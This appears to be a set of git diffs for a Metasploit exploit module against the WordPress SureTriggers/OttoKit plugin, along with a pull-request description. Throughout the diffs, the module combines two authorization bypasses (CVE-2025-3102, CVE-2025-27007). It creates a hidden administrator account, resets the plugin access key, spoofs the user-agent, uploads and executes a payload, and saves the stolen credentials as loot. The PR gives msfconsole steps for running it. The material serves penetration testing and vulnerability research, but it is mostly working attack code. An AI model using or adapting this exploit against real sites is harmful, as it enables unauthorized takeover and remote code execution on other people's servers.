-      'integration' => 'WordPress',
-      'type_event' => 'create_user_if_not_exists',
-      'selected_options' => {
-        'user_name' => datastore['WP_USER'],
-        'password' => datastore['WP_PASS'],
-        'user_email' => datastore['WP_EMAIL'],
-        'role' => 'administrator'
-      },
-      'fields' => [],
-      'context' => {}
-    }
   end
 
   def upload_and_execute_payload(auth_cookie)

--- a/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb
+++ b/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Payload::Php
   include Msf::Auxiliary::Report
+  include Msf::Module::HasActions
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HTTP::Wordpress
@@ -38,9 +39,9 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://cloud.projectdiscovery.io/library/CVE-2025-27007']
         ],
         'License' => MSF_LICENSE,
-        'Privileged' => false,
         'Platform' => %w[unix linux win php],
         'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Privileged' => false,
         'Targets' => [
           [
             'PHP In-Memory',
@@ -68,6 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2025-03-13',
+        'Actions' => [
+          ['CVE-2025-3102', { 'Description' => 'SureTriggers <= 1.0.78 auth bypass & RCE' }],
+          ['CVE-2025-27007', { 'Description' => 'SureTriggers <= 1.0.82 auth bypass, reset & RCE' }]
+        ],
+        'DefaultAction' => 'CVE-2025-27007',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
@@ -78,11 +84,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('WP_USER', [true, 'Username for the new administrator', Faker::Internet.username(specifier: 5..8)]),
-        OptString.new('WP_PASS', [true, 'Password for the new administrator', Faker::Internet.password(min_length: 12)]),
-        OptString.new('WP_EMAIL', [true, 'Email for the new administrator', Faker::Internet.email(name: Faker::Internet.username(specifier: 5..8))]),
-        OptString.new('ST_AUTH', [false, 'St-Authorization header', Rex::Text.rand_text_alphanumeric(16)]),
-        OptString.new('ACTION', [true, 'Action to perform (CVE-2025-3102 or CVE-2025-27007)', 'CVE-2025-3102']),
+        OptString.new('WP_USER', [ true, 'Username for the new administrator', Faker::Internet.username(specifier: 5..8) ]),
+        OptString.new('WP_PASS', [ true, 'Password for the new administrator', Faker::Internet.password(min_length: 12) ]),
+        OptString.new('WP_EMAIL', [ true, 'Email for the new administrator', Faker::Internet.email(name: Faker::Internet.username(specifier: 5..8)) ]),
+        OptString.new('ST_AUTH', [ false, 'Value for st_authorization header', Rex::Text.rand_text_alphanumeric(16)])
       ]
     )
   end
@@ -90,103 +95,80 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     return CheckCode::Unknown('Target not responding') unless wordpress_and_online?
 
-    wp_version = wordpress_version
-    print_status("Detected WordPress version: #{wp_version}") if wp_version
+    print_status("Detected WordPress version: #{wordpress_version}") if wordpress_version
 
     plugin = 'suretriggers'
-    readme = check_plugin_version_from_readme(plugin, '1.0.82')
-    version = readme&.details&.dig(:version)
-    unless version
-      return CheckCode::Unknown("Unable to determine the #{plugin} plugin version.")
-    end
+    max_versions = {
+      'cve-2025-3102' => '1.0.78',
+      'cve-2025-27007' => '1.0.82'
+    }
+    max_vuln = max_versions[action.name.downcase]
 
-    detected = Rex::Version.new(version)
-    if detected <= Rex::Version.new('1.0.78')
-      return CheckCode::Appears("Detected #{plugin} version #{detected} (vulnerable to CVE-2025-3102)")
-    elsif detected <= Rex::Version.new('1.0.82')
-      return CheckCode::Appears("Detected #{plugin} version #{detected} (vulnerable to CVE-2025-27007)")
+    detected = check_plugin_version_from_readme(plugin)&.details&.dig(:version)
+    return CheckCode::Unknown("Unable to determine #{plugin} version") unless detected
+
+    ver = Rex::Version.new(detected)
+    if ver <= Rex::Version.new(max_vuln)
+      CheckCode::Appears("Detected #{plugin} #{ver} vulnerable to #{action.name}")
     else
-      return CheckCode::Safe("Detected #{plugin} version #{detected} (appears patched)")
+      CheckCode::Safe("Detected #{plugin} #{ver} appears patched")
     end
   end
 
   def exploit
-    action = datastore['ACTION'].to_s.upcase
-    case action
-    when 'CVE-2025-3102'
-      exploit_cve3102
-    when 'CVE-2025-27007'
-      exploit_cve27007
-    else
-      fail_with(Failure::BadConfig, "Unknown action: #{datastore['ACTION']}")
+    token = ''
+    if action.name.downcase == 'cve-2025-27007'
+      reset_access_key
+      token = datastore['ST_AUTH']
     end
-  end
 
-  def exploit_cve3102
-    print_status('CVE-2025-3102: creating admin via St-Authorization Bearer (empty)')
-    uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action')
-    headers = { 'St-Authorization' => 'Bearer ' }
-
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => uri,
-      'ctype' => 'application/json',
-      'data' => user_payload.to_json,
-      'headers' => headers
-    )
+    headers = { 'St-Authorization' => "Bearer #{token}" }
+    res = create_admin_request(headers)
     unless res&.code == 200 && res.get_json_document&.dig('success')
-      vprint_warning('Primary endpoint failed, trying fallback via rest_route...')
-      res = send_request_cgi(
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path),
-        'vars_get' => { 'rest_route' => '/sure-triggers/v1/automation/action' },
-        'ctype' => 'application/json',
-        'data' => user_payload.to_json,
-        'headers' => headers
-      )
+      fail_with(Failure::UnexpectedReply, "#{action.name}: user creation failed")
     end
-    fail_with(Failure::UnexpectedReply, 'CVE-2025-3102: user creation failed') unless res&.code == 200 && res.get_json_document&.dig('success')
 
     finalize_admin
     cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS'])
     upload_and_execute_payload(cookie)
   end
 
-  def exploit_cve27007
-    print_status('CVE-2025-27007: reset access key & create admin')
-    reset_access_key
-
-    uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action')
-    headers = { 'St-Authorization' => "Bearer #{datastore['ST_AUTH']}" }
-
+  # Sends a JSON POST to wp-json/<segments>, then retries via rest_route without wp-json
+  def send_json_with_fallback(segments, payload, headers)
+    # Primary path
+    uri = normalize_uri(target_uri.path, 'wp-json', *segments)
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => uri,
       'ctype' => 'application/json',
-      'data' => user_payload.to_json,
+      'data' => payload,
       'headers' => headers
     )
+    # Fallback
     unless res&.code == 200 && res.get_json_document&.dig('success')
       vprint_warning('Primary endpoint failed, trying fallback via rest_route...')
       res = send_request_cgi(
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path),
-        'vars_get' => { 'rest_route' => '/sure-triggers/v1/automation/action' },
+        'vars_get' => { 'rest_route' => "/#{segments.join('/')}" },
         'ctype' => 'application/json',
-        'data' => user_payload.to_json,
+        'data' => payload,
         'headers' => headers
       )
     end
-    fail_with(Failure::UnexpectedReply, 'CVE-2025-27007: user creation failed') unless res&.code == 200 && res.get_json_document&.dig('success')
+    res
+  end
 
-    finalize_admin
-    cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS'])
-    upload_and_execute_payload(cookie)
+  def create_admin_request(headers)
+    send_json_with_fallback(
+      ['sure-triggers', 'v1', 'automation', 'action'],
+      user_payload.to_json,
+      headers
+    )
   end
 
   def reset_access_key
     print_status('Resetting access key')
-    uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'connection', 'create-wp-connection')
     body = {
       'sure-triggers-access-key' => datastore['ST_AUTH'],
       'wp-password' => datastore['WP_PASS'],
@@ -195,24 +177,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'connected_email' => datastore['WP_EMAIL']
     }.to_json
 
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => uri,
-      'ctype' => 'application/json',
-      'data' => body,
-      'headers' => { 'User-Agent' => 'OttoKit' }
+    res = send_json_with_fallback(
+      ['sure-triggers', 'v1', 'connection', 'create-wp-connection'],
+      body,
+      { 'User-Agent' => 'OttoKit' }
     )
-    unless res&.code == 200 && res.get_json_document&.dig('success')
-      vprint_warning('Primary endpoint failed, trying fallback via rest_route...')
-      res = send_request_cgi(
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path),
-        'vars_get' => { 'rest_route' => '/sure-triggers/v1/connection/create-wp-connection' },
-        'ctype' => 'application/json',
-        'data' => body,
-        'headers' => { 'User-Agent' => 'OttoKit' }
-      )
-    end
+
     fail_with(Failure::UnexpectedReply, 'Key reset failed') unless res&.code == 200 && res.get_json_document&.dig('success')
     print_good('Access key reset successful')
   end

--- a/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb
+++ b/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb
@@ -95,7 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     return CheckCode::Unknown('Target not responding') unless wordpress_and_online?
 
-    print_status("Detected WordPress version: #{wordpress_version}") if wordpress_version
+    wp_version = wordpress_version
+    print_status("Detected WordPress version: #{wp_version}") if wp_version
 
     plugin = 'suretriggers'
     max_versions = {

--- a/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb
+++ b/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb
@@ -221,20 +221,9 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     vprint_good("Credential for user '#{datastore['WP_USER']}' stored successfully.")
 
-    loot_data = "Username: #{datastore['WP_USER']}, Password: #{datastore['WP_PASS']}\n"
-    loot_path = store_loot(
-      'wordpress.admin.created',
-      'text/plain',
-      datastore['RHOST'],
-      loot_data,
-      'wp_admin_credentials.txt',
-      'WordPress Created Admin Credentials'
-    )
-    vprint_good("Loot saved to: #{loot_path}")
-
     report_host(host: datastore['RHOST'])
 
-    report_service(
+    service = report_service(
       host: datastore['RHOST'],
       port: datastore['RPORT'],
       proto: 'tcp',
@@ -242,11 +231,24 @@ class MetasploitModule < Msf::Exploit::Remote
       info: 'WordPress with vulnerable SureTriggers plugin allowing unauthenticated admin creation'
     )
 
+    loot_data = "Username: #{datastore['WP_USER']}, Password: #{datastore['WP_PASS']}\n"
+    loot_path = store_loot(
+      'wordpress.admin.created',
+      'text/plain',
+      datastore['RHOST'],
+      loot_data,
+      'wp_admin_credentials.txt',
+      'WordPress Created Admin Credentials',
+      service
+    )
+    vprint_good("Loot saved to: #{loot_path}")
+
     report_vuln(
       host: datastore['RHOST'],
       port: datastore['RPORT'],
       proto: 'tcp',
-      name: 'SureTriggers Auth Bypass',
+      service: service,
+      name: "SureTriggers Auth Bypass (#{action.name})",
       refs: references,
       info: 'Unauthenticated admin creation via SureTriggers plugin'
     )

--- a/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb
+++ b/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'WordPress SureTriggers/OttoKit Combined Auth Bypass (CVE-2025-3102, CVE-2025-27007)',
+        'Name' => 'WordPress SureTriggers (aka OttoKit) Combined Auth Bypass (CVE-2025-3102, CVE-2025-27007)',
         'Description' => %q{
           Exploits two distinct authorization bypasses in SureTriggers/OttoKit plugin:
           - CVE-2025-3102: admin creation via St-Authorization Bearer (empty)
@@ -108,6 +108,8 @@ class MetasploitModule < Msf::Exploit::Remote
     detected = check_plugin_version_from_readme(plugin)&.details&.dig(:version)
     return CheckCode::Unknown("Unable to determine #{plugin} version") unless detected
 
+    @plugin_version = detected
+
     ver = Rex::Version.new(detected)
     if ver <= Rex::Version.new(max_vuln)
       CheckCode::Appears("Detected #{plugin} #{ver} vulnerable to #{action.name}")
@@ -168,6 +170,12 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  def user_agent_header
+    return 'SureTriggers' unless @plugin_version
+
+    @plugin_version < Rex::Version.new('1.0.81') ? 'SureTriggers' : 'OttoKit'
+  end
+
   def reset_access_key
     print_status('Resetting access key')
     body = {
@@ -181,7 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_json_with_fallback(
       ['sure-triggers', 'v1', 'connection', 'create-wp-connection'],
       body,
-      { 'User-Agent' => 'OttoKit' }
+      { 'User-Agent' => user_agent_header }
     )
 
     fail_with(Failure::UnexpectedReply, 'Key reset failed') unless res&.code == 200 && res.get_json_document&.dig('success')


### PR DESCRIPTION
Hello Metasploit Team,

This change extends the existing SureTriggers/OttoKit Metasploit module by adding support for **CVE-2025-27007** alongside the already implemented **CVE-2025-3102** flow. Rather than splitting into two modules, both authorization bypass vulnerabilities are handled in one combined exploit since they share common endpoints and can be chained.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/wp_suretriggers_auth_bypass`
- [ ] `set RHOSTS <target>`
- [ ] `set TARGETURI <path>`
- [ ] `set WP_USER <user>`
- [ ] `set WP_PASS <password>`
- [ ] `set ACTION CVE-2025-3102` and `run`; **Verify** admin creation and payload execution
- [ ] `set ACTION CVE-2025-27007` and `run`; **Verify** access key reset, admin creation, and payload execution
- [ ] **Verify** the `check` method correctly detects both CVEs
- [ ] **Document** the combined module in `documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md`